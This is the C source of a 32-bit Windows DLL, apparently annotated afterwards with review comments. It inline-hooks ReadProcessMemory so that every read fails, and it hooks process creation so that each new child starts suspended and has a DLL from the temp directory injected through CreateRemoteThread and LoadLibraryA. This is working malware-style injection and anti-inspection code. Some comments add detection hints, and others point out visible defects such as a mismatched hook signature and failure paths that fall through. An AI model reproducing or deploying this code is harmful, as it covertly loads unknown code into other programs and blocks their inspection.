- ////////////////////////////////////
- //功能:hook CreateProcess注入
- ////////////////////////////////////
- #include <windows.h>
- #include <stdio.h>
- #define _CRT_SECURE_NO_DEPRECATE
- #define _CRT_SECURE_NO_WARNINGS
/* Continuation addresses for the two inline hooks that DllMain installs.
 * Each holds (patched export address + 5), i.e. the first byte after the
 * 5-byte JMP written over the target's prologue; the naked Org* thunks
 * below re-execute the overwritten prologue and then jump here.
 * (The _CRT_SECURE_NO_* defines above are placed after the <stdio.h>
 * include, so they do not affect it.) */
DWORD org_ReadProcessMemory;
DWORD org_CreateProcessA;
HANDLE ghInstance = 0;   /* not referenced anywhere else in this listing */
char path[1024];         /* temp-directory path of the DLL name, built in MyCreateProcessA */
/* Trampoline into the original ReadProcessMemory.
 * Naked: the compiler emits no prologue/epilogue. The inline asm replays the
 * three instructions that the 5-byte JMP written by DllMain overwrote
 * ("mov edi,edi / push ebp / mov ebp,esp") and then jumps to the saved
 * continuation. It assumes the export really starts with that hot-patch
 * prologue; nothing in the listing verifies that before patching.
 * MSVC-only (__declspec(naked), __asm) and 32-bit x86 only.
 * Never called in this listing: the call in MyReadProcessMemory is commented out. */
int __declspec(naked) __stdcall OrgReadProcessMemory(
HANDLE hProcess, // handle to the process
LPCVOID lpBaseAddress, // base of memory area
LPVOID lpBuffer, // data buffer
DWORD nSize, // number of bytes to read
LPDWORD lpNumberOfBytesRead // number of bytes read
)
{
__asm {
mov edi,edi
push ebp
mov ebp,esp
jmp [org_ReadProcessMemory]   // continue at (patched address + 5)
}
}
char tmp1[255];   /* scratch buffer for the commented-out debug trace in MyReadProcessMemory */
/* Replacement that DllMain writes a JMP to over kernel32!ReadProcessMemory.
 * Returns 0 (FALSE) unconditionally and never forwards to the original, so
 * every ReadProcessMemory call made from the hooked process fails; the
 * debug trace and the pass-through are both commented out.
 * Defender note: the patch leaves a 0xE9 byte at the start of the export;
 * comparing the in-memory prologue against the on-disk kernel32 image
 * reveals it. */
BOOL __stdcall MyReadProcessMemory(
HANDLE hProcess, // handle to the process
LPCVOID lpBaseAddress, // base of memory area
LPVOID lpBuffer, // data buffer
DWORD nSize, // number of bytes to read
LPDWORD lpNumberOfBytesRead // number of bytes read
)
{
// sprintf(tmp1,"P-[%d]%08X",nSize,lpBaseAddress);OutputDebugString(tmp1);
//DWORD ret=OrgReadProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead);
//return ret;
return 0;   // FALSE: the read is refused, lpNumberOfBytesRead is left untouched
}
/* Trampoline into the function DllMain patches under the name
 * org_CreateProcessA. Same shape as OrgReadProcessMemory: naked, replays the
 * overwritten hot-patch prologue, then jumps to (patched address + 5).
 * NOTE(review): the signature here is CreateProcessA's, but the address
 * DllMain actually patches is resolved as ntdll "ZwCreateProcess"; the
 * listing does not reconcile the two.
 * MSVC-only (__declspec(naked), __asm) and 32-bit x86 only. */
int __declspec(naked) __stdcall OrgCreateProcessA(
LPCTSTR lpApplicationName, // name of executable module
LPTSTR lpCommandLine, // command line string
LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
BOOL bInheritHandles, // handle inheritance option
DWORD dwCreationFlags, // creation flags
LPVOID lpEnvironment, // new environment block
LPCTSTR lpCurrentDirectory, // current directory name
LPSTARTUPINFO lpStartupInfo, // startup information
LPPROCESS_INFORMATION lpProcessInformation // process information
)
{
__asm {
mov edi,edi
push ebp
mov ebp,esp
jmp [org_CreateProcessA]   // continue at (patched address + 5)
}
}
char tmp2[255];   /* declared but not used anywhere in this listing */
/* Replacement that DllMain installs under the CreateProcessA name (see the
 * note in DllMain about which address is actually patched).
 *
 * What the body does, in order:
 *   1. calls through OrgCreateProcessA with the caller's dwCreationFlags
 *      replaced by CREATE_SUSPENDED (the caller's own flags are discarded);
 *   2. builds "<temp dir>unimper.dll" in the global 'path';
 *   3. VirtualAllocEx + WriteProcessMemory to place that string in the child;
 *   4. CreateRemoteThread on LoadLibraryA with the string as argument, waits
 *      for it, frees the buffer, then ResumeThread on the child's hThread.
 * Steps 1-4 are the classic remote-thread DLL-injection sequence. From a
 * detection standpoint the observable is a child created suspended that
 * loads a DLL from the temp directory before its own entry point runs, plus
 * the cross-process VirtualAllocEx/WriteProcessMemory/CreateRemoteThread calls.
 *
 * Review notes (visible defects, not changed here):
 *   - none of the three failure branches return: after the MessageBox and
 *     CloseHandle, execution continues into WriteProcessMemory /
 *     CreateRemoteThread with a NULL buf and/or a closed process handle;
 *   - the results of GetTempPath, strcat (no bound check against path[1024]),
 *     CreateRemoteThread (hThread may be NULL) and ResumeThread are not checked;
 *   - LoadLibraryA is resolved in this process and used as an address in the
 *     child, which presumes kernel32 is mapped at the same base there;
 *   - the MessageBox texts say "Alloc" even in the write-failure cases.
 */
BOOL __stdcall MyCreateProcessA(
LPCTSTR lpApplicationName, // name of executable module
LPTSTR lpCommandLine, // command line string
LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
BOOL bInheritHandles, // handle inheritance option
DWORD dwCreationFlags, // creation flags
LPVOID lpEnvironment, // new environment block
LPCTSTR lpCurrentDirectory, // current directory name
LPSTARTUPINFO lpStartupInfo, // startup information
LPPROCESS_INFORMATION lpProcessInformation // process information
)
{
//MessageBox(0,lpCommandLine,lpApplicationName,0);

// Create the child suspended so the injection below happens before it runs;
// the caller's dwCreationFlags are not merged in.
BOOL ret=OrgCreateProcessA(
lpApplicationName, // name of executable module
lpCommandLine, // command line string
lpProcessAttributes, // SD
lpThreadAttributes, // SD
bInheritHandles, // handle inheritance option
CREATE_SUSPENDED, // creation flags (caller's value replaced)
lpEnvironment, // new environment block
lpCurrentDirectory, // current directory name
lpStartupInfo, // startup information
lpProcessInformation // process information
);
;   // stray empty statement
// Build the DLL path in the global buffer: temp dir + fixed file name.
// GetTempPath's return value is not checked, strcat is unbounded.
GetTempPath(255,path);
strcat(path,"unimper.dll");
//MessageBox(0,path,"tip",0);
DWORD size = strlen( path ) + 1;   // include the terminating NUL
LPVOID buf = VirtualAllocEx( lpProcessInformation->hProcess, NULL, size, MEM_COMMIT, PAGE_READWRITE );
if ( NULL == buf )
{
MessageBox(0,"Alloc Memery Failed!\n",0,0);
CloseHandle( lpProcessInformation->hProcess );
// falls through: buf is NULL and the handle is closed below this point
}
DWORD dwWritten;
if ( WriteProcessMemory( lpProcessInformation->hProcess, buf, (PVOID)path, size, &dwWritten ) )
{
// A short write (bytes written != bytes requested) is still a failure.
if ( dwWritten != size )
{
MessageBox(0,"Alloc Memery Failed!!!!!!!!!!!!!!!!!!\n",0,0);
VirtualFreeEx( lpProcessInformation->hProcess, buf, size, MEM_DECOMMIT );
CloseHandle( lpProcessInformation->hProcess );
// falls through
}
}
else
{
MessageBox(0,"Alloc Memery Failed!\n",0,0);
CloseHandle( lpProcessInformation->hProcess );
// falls through
}
// Resolved in this process, used as a start address in the child.
LPVOID pLoadLibrary = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
DWORD dwThreadId;
// Remote thread whose entry is LoadLibraryA and whose argument is the path
// written above; hThread is not checked for NULL before use.
HANDLE hThread = CreateRemoteThread( lpProcessInformation->hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, buf, 0 , &dwThreadId );
WaitForSingleObject( hThread, INFINITE );
VirtualFreeEx( lpProcessInformation->hProcess, buf, size, MEM_DECOMMIT );
CloseHandle( hThread );
// Let the child run regardless of whether the caller asked for CREATE_SUSPENDED.
ResumeThread (lpProcessInformation->hThread);


return ret;   // the original call's result, unaffected by the injection outcome




//return 0;
}
/* DLL entry point. On DLL_PROCESS_ATTACH it creates a named mutex "Process".
 * Only when GetLastError reports ERROR_ALREADY_EXISTS (the mutex was created
 * earlier, by another process) are the two inline hooks installed; otherwise
 * it returns 0 (FALSE), which makes the loader fail this DLL's load.
 *
 * Hook installation, same for both targets: VirtualProtect the first 5 bytes
 * to PAGE_EXECUTE_READWRITE, write 0xE9 (JMP rel32) aimed at the My*
 * replacement, and store (target + 5) as the continuation the Org* thunks
 * jump to. The previous protection (oldflag) is never restored, so those
 * pages stay RWX -- a memory scan of kernel32/ntdll text can flag that.
 *
 * Review notes (visible defects, not changed here):
 *   - NOTE(review): pCreateProcessA is resolved as ntdll "ZwCreateProcess",
 *     while MyCreateProcessA and OrgCreateProcessA carry the CreateProcessA
 *     signature; the two do not share a signature, so the run-time effect of
 *     that patch is not established by this listing;
 *   - hMutex, both GetProcAddress results and both VirtualProtect results are
 *     used without being checked;
 *   - the 5-byte write assumes the hot-patch prologue that the Org* thunks
 *     replay; nothing verifies it first;
 *   - hMutex is not closed on the else path;
 *   - the (DWORD) casts of function pointers restrict this to 32-bit builds.
 */
BOOL WINAPI DllMain(HINSTANCE hinstModule, DWORD dwReason, LPVOID lpvReserved)
{
if(dwReason == DLL_PROCESS_ATTACH)
{

HANDLE hMutex = CreateMutex(NULL, false, "Process");
if (GetLastError() == ERROR_ALREADY_EXISTS)
{

DWORD pReadProcessMemory = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "ReadProcessMemory");
DWORD pCreateProcessA = (DWORD)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwCreateProcess");   // see note: not CreateProcessA
DWORD oldflag;
// Make the first 5 bytes of each target writable; oldflag is overwritten
// by the second call and never restored.
VirtualProtect((PVOID)pReadProcessMemory, 5, PAGE_EXECUTE_READWRITE, &oldflag);
VirtualProtect((PVOID)pCreateProcessA, 5, PAGE_EXECUTE_READWRITE, &oldflag);
// 0xE9 = JMP rel32; the displacement is relative to the end of the 5-byte instruction.
*(PCHAR)pReadProcessMemory = '\xE9';
*(PCHAR)pCreateProcessA = '\xE9';
*(DWORD*)(pReadProcessMemory+1) = (DWORD)MyReadProcessMemory - (pReadProcessMemory+5);
*(DWORD*)(pCreateProcessA+1) = (DWORD)MyCreateProcessA - (pCreateProcessA+5);
// Continuation points for the Org* thunks: first byte after the patch.
org_ReadProcessMemory = pReadProcessMemory+ 5;
org_CreateProcessA = pCreateProcessA+ 5;
CloseHandle(hMutex);
}
else
{
return 0;   // FALSE: the loader fails the attach; hMutex is leaked here

}
}
return true;
}